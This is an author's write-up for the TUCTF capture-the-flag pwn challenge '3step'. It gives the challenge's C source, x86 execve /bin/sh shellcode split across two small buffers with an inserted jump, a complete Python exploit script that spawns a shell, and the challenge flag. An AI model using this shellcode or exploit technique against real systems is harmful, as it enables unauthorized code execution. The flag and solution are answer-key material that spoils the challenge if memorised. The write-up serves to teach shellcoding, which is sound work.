# 3step Author Writeup

## Description

"Gonna have to get crafty with this one."

*Hint:* Two buffers huh. Can you use both?

## A Word From The Author

shellcode is fun and usually requires a single contigoius block of memory. This challenge subverts that by splitting your buffer into two buffers. There were 2 previous shellcode challenges before this one. It's common for people to slap shellcode they find on [shell storm](http://shell-storm.org/shellcode/) in a payload and hope for the best. This challenge was created so people can better understand shellcode. To solve this challenge you must understand a given payload, be able to cut it in half, possibly move around operations, and inject a jump.


## Information Gathering

```c
#include <stdio.h>  // prints
#include <stdlib.h> // malloc
#include <string.h> // strcmp
#include <unistd.h> // read
#include <fcntl.h>  // open
#include <unistd.h> // close
#include <time.h>   // time

#define BUF1_LEN 18
#define BUF2_LEN 16

char buf1[BUF1_LEN];

void pwnme() {
	char buf2[BUF2_LEN];
	puts("Try out complimentary snacks");
	printf("%p\n", buf1);
	printf("%p\n\n", buf2);

	// First shellcode chunk
	printf("Step 1: ");
	read(0, buf1, BUF1_LEN);

	// Second shellcode chunk
	printf("Step 2: ");
	read(0, buf2, BUF2_LEN);

	// Address to ROP to
	printf("Step 3: ");

	// Create temporary buffer
	char addr[4];
	read(0, addr, 4);

	// Create function pointer
	void (*foo)(void);
	// Copy contents into function call
	memcpy(&foo, addr, 4);

	foo();
}


int main() {
    setvbuf(stdout, NULL, _IONBF, 20);
    setvbuf(stdin, NULL, _IONBF, 20);

	puts("Welcome to our 3-step program!");
	pwnme();

    return 0;
}
```

![Screenshot from 2019-12-29 19-56-58.png](./imgs/ac22751e4b14482698113ce01647a8b5.png)

As we can see from the C code, the program spits out both buffers we are writing to. Then we enter data into two buffers (18 bytes and 16 bytes respectfully) and then a pointer to an address to jump to. The smallest shellcode I could ever find, that consistently worked, was 21 bytes. Neither the 18 nor 16 byte buffers are big enough for one full chunk of shellcode, so we must split it up and add a jump.

## Exploitation

Now that we have the solution for this challenge, we can build the exploit. We knkow we need to take one chunk of `execve /bin/bash` shellcode and split the execution between two small buffers. I made the first buffer 18 bytes and the second 16 bytes to circumvent normal shellcode. Lots of shellcode has smaller byte operations in the first half and larger operations, such as puting */bin/sh* on the stack, so I made the first buffer bigger to slightly increase the difficulty.

Here's the shellcode I normally uses:

``` assembly
0:  31 c9                   xor    ecx,ecx
2:  f7 e1                   mul    ecx
4:  b0 0b                   mov    al,0xb
6:  51                      push   ecx
7:  68 2f 2f 73 68          push   0x68732f2f
c:  68 2f 62 69 6e          push   0x6e69622f
11: 89 e3                   mov    ebx,esp
13: cd 80                   int    0x80
```

And here's how I split it up:

``` assembly
0:  31 c9                   xor    ecx,ecx
2:  f7 e1                   mul    ecx
4:  b0 0b                   mov    al,0xb
6:  51                      push   ecx

0:  bb ef be ad de          mov    ebx,0xdeadbeef
5:  ff e3                   jmp    ebx
; 0xdeadbeef = buf2
```

``` assembly
7:  68 2f 2f 73 68          push   0x68732f2f
c:  68 2f 62 69 6e          push   0x6e69622f
11: 89 e3                   mov    ebx,esp
13: cd 80                   int    0x80
```

This conveniently comes out to be a 14:14 byte split with the jump added in. Now that we have our shellcode distribution, lets send it to the binary and see if we pop a shell.

**NOTE:** *thpoonpwn* is my own custom pwn library.

``` python
#!/usr/bin/env python
from thpoonpwn import *

elf,libc,args = pwninit(
    remcmd =    'chal.tuctf.com 30504',
    localcmd =  './3step',
#    libcid =    '',
#    libcfile =  './',
    local =     True,
    pause =     True,
    copy =      True,
#    ldpreload = True,
#    debug=True
)
p = pwnstart(args)
#___________________________________________________________________________________________________
#Shellcode
sc = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"


p.recvuntil("snacks\n")
buf1 = (int(p.recv(10), 16)) # 18 bytes
p.recv(1) # newline
buf2 = (int(p.recv(10), 16)) # 16 bytes
#print "buf1: " + str(hex(buf1))
#print "buf2: " + str(hex(buf2))
buf1 = p32(buf1)
buf2 = p32(buf2)


# Shellcode Chunks
sc1 = sc[:7]
sc1 += "\xbb" + buf2 # Jump to second bufer
sc1 += "\xff\xe3"
# 0:  31 c9                   xor    ecx,ecx
# 2:  f7 e1                   mul    ecx
# 4:  b0 0b                   mov    al,0xb
# 6:  51                      push   ecx
#
# 0:  bb ef be ad de          mov    ebx,0xdeadbeef
# 5:  ff e3                   jmp    ebx
# 0xdeadbeef = buf2

sc2 = sc[7:]
# 7:  68 2f 2f 73 68          push   0x68732f2f
# c:  68 2f 62 69 6e          push   0x6e69622f
# 11: 89 e3                   mov    ebx,esp
# 13: cd 80                   int    0x80

# The sleeps prevent whack segfaults
p.send(sc1); sleep(0.1)
p.send(sc2); sleep(0.1)
p.send(buf1); sleep(0.1)
p.recv(); p.recv()

p.interactive()

print len(sc1)
print len(sc2)
#___________________________________________________________________________________________________
pwnend(p, args)

```


![flag.png](./imgs/1d58520fc9da47bfb023970d8a31672e.png)


## Endgame

Hopefully this challenge has strengthened your shellcoding abilities. Happy pwning!

> **flag:** TUCTF{4nd_4_0n3,_4nd_4_7w0,_4nd_5h3ll_f0r_y0u!}
